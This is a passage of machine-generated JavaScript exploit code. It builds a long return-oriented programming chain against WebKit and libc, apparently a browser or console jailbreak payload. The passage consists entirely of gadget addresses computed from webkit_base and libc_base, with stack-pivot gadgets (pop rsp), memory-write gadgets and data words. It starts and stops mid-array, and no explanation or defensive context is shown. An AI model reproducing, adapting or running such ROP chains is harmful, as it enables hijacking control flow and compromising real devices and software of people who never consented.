webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4895: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+262952, //L4897 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+262968, //L4898 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+262936, //L4896 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4896: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4897: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4898: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+263080, //L4900 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+263128, //L4903 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+263096, //L4901 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4900: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4901: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4902: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4903: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+263240, //L4904+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+263232, //L4904 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4904: db([0, 0]); // 0x0 set_gadgets([ ropchain+263256, //L4904+24 ropchain+265280, //L4899 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+263296, //L4905 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4905: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4906: db([45, 0]); // 0x2d set_gadget(libc_base+144605,); //pop rdi //L4907: db([45, 0]); // 0x2d set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+263488, //L4911 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+263456, //L4909 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+263472, //L4910 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4908: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4909: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4910: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4911: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+263544, //L4913 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4913: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+263672, //L4915 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+263688, //L4916 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+263656, //L4914 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4914: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4915: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4916: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+263784, //L4918 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+263768, //L4917 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4917: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4918: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+263864, //L4919 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4919: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4921: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+263984, //L4924 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+263968, //L4922 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4922: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4924: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+264128, //L4927 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+264096, //L4925 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+264112, //L4926 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4925: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4926: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4927: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+264200, //L4929 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4929: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+264256, //L4930 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4930: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+264336, //L4932 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4932: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4934: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+264456, //L4937 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+264440, //L4935 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4935: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4937: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+264600, //L4940 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+264568, //L4938 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+264584, //L4939 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4938: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4939: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4940: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+264688, //L4942 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4941: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L4942: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+264744, //L4943 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4943: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4945: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+264824, //L4947 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4947: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+264928, //L4948 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+264944, //L4949 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4948: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4949: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+265032, //L4951 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4951: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+265088, //L4952 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4952: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+265160, //L4955 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4955: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+265216, //L4956 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4956: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+271584, //L4958 //L4899: libc_base+764760, //pop rsi ropchain+265320, //L4959 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4959: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4961: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+265440, //L4964 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+265424, //L4962 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4962: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4964: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+265616, //L4967 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+265632, //L4968 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+265584, //L4965 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+265600, //L4966 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4965: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4966: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4967: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4968: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+265728, //L4970 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+265712, //L4969 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4969: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4970: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4971: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4972: db([2, 0]); // 0x2 set_gadget(libc_base+763368,); //pop rcx //L4973: db([2, 0]); // 0x2 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+265928, //L4975 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4975: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+265984, //L4976 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4976: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+266120, //L4980 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+266104, //L4979 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4978: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4979: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4980: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+266256, //L4983 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+266288, //L4985 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+266240, //L4982 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4982: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4983: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4984: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4985: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+266400, //L4986+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+266392, //L4986 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4986: db([0, 0]); // 0x0 set_gadgets([ ropchain+266416, //L4986+24 ropchain+268440, //L4981 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+266456, //L4987 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4987: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4988: db([43, 0]); // 0x2b set_gadget(libc_base+144605,); //pop rdi //L4989: db([43, 0]); // 0x2b set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+266648, //L4993 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+266616, //L4991 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+266632, //L4992 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4990: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4991: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4992: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4993: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+266704, //L4995 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4995: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+266832, //L4997 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+266848, //L4998 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+266816, //L4996 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4996: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4997: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4998: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+266944, //L5000 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+266928, //L4999 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4999: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5000: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+267024, //L5001 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5001: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5003: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+267144, //L5006 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+267128, //L5004 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5004: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5006: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+267288, //L5009 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+267256, //L5007 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+267272, //L5008 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5007: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5008: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5009: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+267360, //L5011 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5011: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+267416, //L5012 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5012: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+267496, //L5014 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5014: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5016: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+267616, //L5019 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+267600, //L5017 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5017: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5019: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+267760, //L5022 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+267728, //L5020 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+267744, //L5021 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5020: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5021: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5022: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+267848, //L5024 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L5023: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L5024: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+267904, //L5025 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5025: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5027: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+267984, //L5029 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5029: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+268088, //L5030 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+268104, //L5031 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5030: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5031: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+268192, //L5033 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5033: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+268248, //L5034 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5034: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+268320, //L5037 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5037: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+268376, //L5038 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5038: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+271584, //L5040 //L4981: libc_base+764760, //pop rsi ropchain+268480, //L5041 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5041: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5043: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+268600, //L5046 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+268584, //L5044 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5044: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5046: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+268776, //L5049 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+268792, //L5050 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+268744, //L5047 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+268760, //L5048 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5047: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5048: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5049: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5050: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+268888, //L5052 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+268872, //L5051 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5051: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5052: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5053: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov 